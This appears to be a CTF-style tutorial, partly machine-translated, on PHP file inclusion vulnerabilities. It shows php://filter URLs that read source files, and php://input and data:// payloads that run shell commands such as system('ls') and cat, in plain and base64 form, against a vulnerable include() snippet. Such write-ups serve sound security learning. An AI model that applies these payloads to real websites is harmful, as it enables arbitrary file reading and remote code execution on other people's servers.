File contains vulnerabilities
php://protocol
php://filter and php://input, php://filter is used to read source code, and php://input is used to execute php code.
One, php://filter
When it is combined with the include function, the php://filter stream will be executed as a php file. So we generally base64 encode it to prevent it from not executing. This leads to arbitrary file reading.
http://127.0.0.1/cmd.php?file=php://filter/read=convert.base64-encode/resource=index.php
Example: [ACTF2020 Freshman Competition] Include
Look at the url carefully and find that there is flag.php to
judge that this title is a PHP pseudo-protocol issue.
Build a payload
?file=php://filter/read=convert.base64-encode/resource=flag.php
base64 decoded
例题:[BSidesCF 2020]Had a bad day
The php pseudo-protocol can set a layer of agreement to bypass, read any file, and read flag.php directly
?category=php://filter/read=convert.base64-encode/woofers/resource=flag
二、 php://input
A read-only stream that can access the original data of the request, and execute the data in the post request as PHP code.
http://127.0.0.1/cmd.php?file=php://input
Example: Web_php_include
0x01 source code
First, get the title and we see the following php code displayed on the page
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
$page=str_replace("php://", "", $page);
}
include($page);
?>
Method 1: This topic uses the strstr() function, this function is case sensitive, so here we can bypass strstr() directly
View the source code:
Method 2: date:// pseudo-protocol execution command
Usage: data://text/plain;base64,xxxx (base64 encoded data)
data://text/plain,<?php system("ls")?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=
data://text/plain,<?php system("cat fl4gisisish3r3.php")?>
data://text/plain/;base64,PD9waHAgc3lzdGVtKCJjYXQgZmw0Z2lzaXNpc2gzcjMucGhwIik/Pg==
0x02 summary:
1. The functions that cause file inclusion vulnerabilities usually include:
include, require, include_once, require_once, highlight_file, show_source, file_get_contents, fopen, file, readline
2. data protocol
usage:
data://text/plain,xxxx(php to be executed Code)
data://text/plain;base64,xxxx (base64 encoded data)
3.php://protocol
php://input, used to execute php code, post request to submit data.